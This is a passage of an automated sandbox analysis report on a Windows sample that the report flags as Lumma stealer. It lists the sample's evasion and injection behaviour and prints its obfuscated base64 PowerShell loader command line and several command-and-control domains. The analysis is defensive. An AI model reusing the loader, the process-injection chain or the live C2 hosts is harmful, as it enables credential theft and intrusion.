Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 5390000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 5680000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 8680000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009836E0 rdtsc 0_2_009836E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4203 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4031 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 9.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7008 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2568 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4908 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2596 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009846C0 GetSystemInfo, 0_2_009846C0
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW2
Source: powershell.exe, 00000001.00000002.1741341041.0000000007079000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009836E0 rdtsc 0_2_009836E0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004460D0 LdrInitializeThunk, 5_2_004460D0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00992180 IsDebuggerPresent,RaiseException, 0_2_00992180
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0096F380 GetProcessHeap,RtlAllocateHeap, 0_2_0096F380
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B75BF0 VirtualProtect,GetTickCount,VirtualProtect,GetSystemInfo,SetConsoleCtrlHandler,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,DebugBreak,SleepEx,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,InitializeCriticalSection,InitializeCriticalSection,VirtualAlloc,DebugBreak,InitializeCriticalSection, 0_2_00B75BF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C09879 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00C09879
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.file.exe.88e2000.3.raw.unpack, Interop.cs Reference to suspicious API methods: Kernel32.VirtualAlloc(P_0, P_1, P_2, P_3)
Source: 0.2.file.exe.90b5000.6.raw.unpack, ProcessManager.cs Reference to suspicious API methods: Interop.Kernel32.OpenProcess(1052672, false, P_0)
Source: 1.2.powershell.exe.71c0000.4.raw.unpack, HamerPush.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 1.2.powershell.exe.71c0000.4.raw.unpack, HamerPush.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.0.cs Jump to dropped file
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007623F0 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode, 0_2_007623F0
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: reinforcenh.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stogeneratmns.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: fragnantbui.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: drawzhotdog.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: vozmeatillu.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: offensivedzvju.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ghostreedmnu.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: gutterydhowi.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ptramidermsnqj.shop
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B3C008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt = 'rrqcwf6yfelfaitjspp5lem05xycdtlsxmdjvxtj1qg=' $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9 = '6ixk6qxmw723jyolklhrjq==' $g3idvvq10uz3mjgooc4lurmdlmagvku1dwo8qdt8frkfzgftpg9ntzzpg4rjvjfq0yz14ixkiwfcghof6gqfbgiewzrmlkmwm3p1qoyhjyevtvi9qmmptzfjplffrlzykj0crmoshjwmcluyhr5yxwcmo5b4itq7zgckwfi3yu7932he1gyzfaan6dowktkytyn5ijcb = 'wbvnouxfi5vdhfvlh8vlflqchp99av7e98o0gkg8brhdo82kvbrzpwvpfobxukseh2pcy+l2tcyjfehidtsgghj2bjvred6jn8ymda6pagitivcfaadhriyf6jzmgsg3g8ujc89m0/qyyyad5suzy09/c7hnokp6opvyqwarjowkpo0fjsugtyh9z0izltmfdqlmyrsbjoiyerwb+umgbe9s1hbis2rxnopewvfau7p8cq6jxhs8x8aueu9yx+vbq6oczgsu/boli7fal5ubebcal8sg53utsrbzm7gdvntm0rtidox3ud/axb3htk3owmx9s1hpe4frmpvy2+fvssneucuaqkthljrkwytzlgi=' function 9b0dzdtvy7cbvqsofpdtrvtejjgffbvsem0dkxy3u1xdqi2c6y0t6jumiltpxngmbkwi0odi1jypygyagd8glclw2nvydiggllb5mtcrursvk4ncxi9jfzazzagnto5tdrenfsyvaqvukybxzsbu8v1lab6bdzyfm8ts0ax5umjydgpazjo0nakg0sddwmjbsqhlfi6p ($mko9yvaier8nddieobdsiqsaoi7oy0teepajbrja8lvawcuofu4f6lmwrowqolkdxt8y2ycxscux4rflnjidvditcorx62lm0ic235whrhx31pq09jcfdgiukfvngfrpr76mpmhixbvnpe1my1ov0fjuzihnjhabq8lujebv1ui1juefn9pfq5zcnlmg5t8pak7g27dt, $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt, $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) { $56avddiumwbta7sloc2iwkj72hfx8e4rmzvhaxdxjjqzkpakywv2pyslvct6xlwi1uhbckk19fyntkvdgwzchcbngjwx37zyxixqhzinlvtk0esbgqzcmjazsu42pmxbf9pkm55hmlqmirx2rjrnhncei87nufx8xs4qohoklizasnr07clfvkurwlcnyrm7yrpqv6dj = [convert]::frombase64string($keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt) $vg1zyclurggs4sdnycud5am4vscbybeaybkos43u0iwraucgdbrkcaduux35aj5qcf33hou3i9nnewtbq5xmjtyyxpuwbytqmfou19yohobcnqg9d2f4mi7irefru92kqxay6y9q7ifuiwb7jwr8soe4ifdv3guhv0lpphcesyxdcdav38h9rts1tgq1wnnqoy7s9lr2 = [convert]::frombase64string($q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) $tngurar4fhsv8wq38uwiqaifbgpefhviqfqemxaspwweussthejpoibi4bsllnzxwketflqaket4peuiov6bygtid7alfogbwytjoyownj5joh3zgaxpgxzoq6p7levvyr7qlk4zhknobktwek5er0w89eth9
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt = 'rrqcwf6yfelfaitjspp5lem05xycdtlsxmdjvxtj1qg=' $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9 = '6ixk6qxmw723jyolklhrjq==' $g3idvvq10uz3mjgooc4lurmdlmagvku1dwo8qdt8frkfzgftpg9ntzzpg4rjvjfq0yz14ixkiwfcghof6gqfbgiewzrmlkmwm3p1qoyhjyevtvi9qmmptzfjplffrlzykj0crmoshjwmcluyhr5yxwcmo5b4itq7zgckwfi3yu7932he1gyzfaan6dowktkytyn5ijcb = 'wbvnouxfi5vdhfvlh8vlflqchp99av7e98o0gkg8brhdo82kvbrzpwvpfobxukseh2pcy+l2tcyjfehidtsgghj2bjvred6jn8ymda6pagitivcfaadhriyf6jzmgsg3g8ujc89m0/qyyyad5suzy09/c7hnokp6opvyqwarjowkpo0fjsugtyh9z0izltmfdqlmyrsbjoiyerwb+umgbe9s1hbis2rxnopewvfau7p8cq6jxhs8x8aueu9yx+vbq6oczgsu/boli7fal5ubebcal8sg53utsrbzm7gdvntm0rtidox3ud/axb3htk3owmx9s1hpe4frmpvy2+fvssneucuaqkthljrkwytzlgi=' function 9b0dzdtvy7cbvqsofpdtrvtejjgffbvsem0dkxy3u1xdqi2c6y0t6jumiltpxngmbkwi0odi1jypygyagd8glclw2nvydiggllb5mtcrursvk4ncxi9jfzazzagnto5tdrenfsyvaqvukybxzsbu8v1lab6bdzyfm8ts0ax5umjydgpazjo0nakg0sddwmjbsqhlfi6p ($mko9yvaier8nddieobdsiqsaoi7oy0teepajbrja8lvawcuofu4f6lmwrowqolkdxt8y2ycxscux4rflnjidvditcorx62lm0ic235whrhx31pq09jcfdgiukfvngfrpr76mpmhixbvnpe1my1ov0fjuzihnjhabq8lujebv1ui1juefn9pfq5zcnlmg5t8pak7g27dt, $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt, $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) { $56avddiumwbta7sloc2iwkj72hfx8e4rmzvhaxdxjjqzkpakywv2pyslvct6xlwi1uhbckk19fyntkvdgwzchcbngjwx37zyxixqhzinlvtk0esbgqzcmjazsu42pmxbf9pkm55hmlqmirx2rjrnhncei87nufx8xs4qohoklizasnr07clfvkurwlcnyrm7yrpqv6dj = [convert]::frombase64string($keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt) $vg1zyclurggs4sdnycud5am4vscbybeaybkos43u0iwraucgdbrkcaduux35aj5qcf33hou3i9nnewtbq5xmjtyyxpuwbytqmfou19yohobcnqg9d2f4mi7irefru92kqxay6y9q7ifuiwb7jwr8soe4ifdv3guhv0lpphcesyxdcdav38h9rts1tgq1wnnqoy7s9lr2 = [convert]::frombase64string($q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) $tngurar4fhsv8wq38uwiqaifbgpefhviqfqemxaspwweussthejpoibi4bsllnzxwketflqaket4peuiov6bygtid7alfogbwytjoyownj5joh3zgaxpgxzoq6p7levvyr7qlk4zhknobktwek5er0w89eth9 Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BD6690 cpuid 0_2_00BD6690
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
